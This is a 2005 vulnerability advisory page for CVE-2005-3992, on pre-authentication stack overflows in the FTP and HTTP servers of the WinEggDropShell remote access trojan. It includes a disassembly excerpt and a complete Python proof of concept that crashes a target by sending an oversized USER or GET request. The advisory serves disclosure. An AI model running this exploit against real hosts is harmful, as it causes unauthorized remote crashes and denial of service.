WinEggDropShell Multiple Remote Stack Overflow

2005.12.03
Credit: Sowhat
Risk: High
Local: No
Remote: Yes
CVE: CVE-2005-3992
CWE: N/A


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

WinEggDropShell Multiple Remote Stack Overflow by Sowhat 2005.12.02 http://secway.org/advisory/AD20051202.txt http://secway.org/exploit/wineggdropshell_bof.py.txt Affected: WinEggDropShell Eterntiy version (1.7) Other version may be vulnerable toooooo Overview: WinEggDropShell is a popular Chinese RAT (remote access trojan). WineggDropShell provide HTTP Proxy/Socks Proxy/HTTP Server/FTP Server. for more information, Goooooooooooooogle... Multiple preauth stack overflow found in the HTTP/FTP server can be used to execute arbitrary command or D0S (blue screen, yes, it's cool ;) Vulnerability: 1. FTP USER bof .text:100027BD push offset aUser ; "USER" .text:100027C2 call _strlen .text:100027C7 add esp, 4 .text:100027CA lea edi, [ebp+eax-103h] .text:100027D1 push edi .text:100027D2 push offset aS ; "%s" .text:100027D7 lea edi, [ebp+var_208] .text:100027DD push edi ; char * .text:100027DE call _sprintf ; emmmmm, ;) _ReceiveSocketBuffer can maximum recv 0x200h, but [ebp+var_208] is a 0x104h buffer. 2. FTP Server Pass Command ............. 3. HTTP GET stack overflow! GET /A*260 PoC: http://secway.org/exploit/wineggdropshell_bof.py.txt Greetingz to killer,baozi,Darkeagle,all 0x557 and XFocus guys....;) Reference: [1] https://www.openrce.org/articles/full_view/18 [2] http://www.ccc.de/congress/2005/ [3] http://secway.org #!/usr/bin/python # WinEggDropShell Multipe PreAuth Remote Stack Overflow PoC # HTTP Server "GET" && FTP Server "USER" "PASS" command # Bug Discoverd and coded by Sowhat # Greetingz to killer,baozi,Darkeagle,all 0x557 and XFocus guys....;) # http://secway.org # 2005-10-11 # Affected: # WinEggDropShell Eterntiy version # Other version may be vulnerable toooooo import sys import string import socket if (len(sys.argv) != 4): print "####################################################################### ###" print "# WinEggDropShell Multipe PreAuth Remote Stack Overflow PoC #" print "# This Poc will BOD the vulnerable target #" print "# Bug Discoverd and coded by Sowhat #" print "# http://secway.org #" print "####################################################################### ###" print "nUsage: " + sys.argv[0] + "HTTP/FTP" + " TargetIP" + " Portn" print "Example: n" + sys.argv[0] + " HTTP" + " 1.1.1.1" + " 80" print sys.argv[0] + " FTP" + " 1.1.1.1" + " 21" sys.exit(0) host = sys.argv[2] port = string.atoi(sys.argv[3]) if ((sys.argv[1] == "FTP") | (sys.argv[1] == "ftp")): request = "USER " + 'A'*512 + "r" if ((sys.argv[1] == "HTTP") | (sys.argv[1] == "http")): request = "GET /" + 'A'*512 + " HTTP/1.1 rn" exp = socket.socket(socket.AF_INET,socket.SOCK_STREAM) exp.connect((host,port)) exp.send(request) ---EOF----- -- Sowhat http://secway.org "Life is like a bug, Do you know how to exploit it ?"


See this note in RAW Version
Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top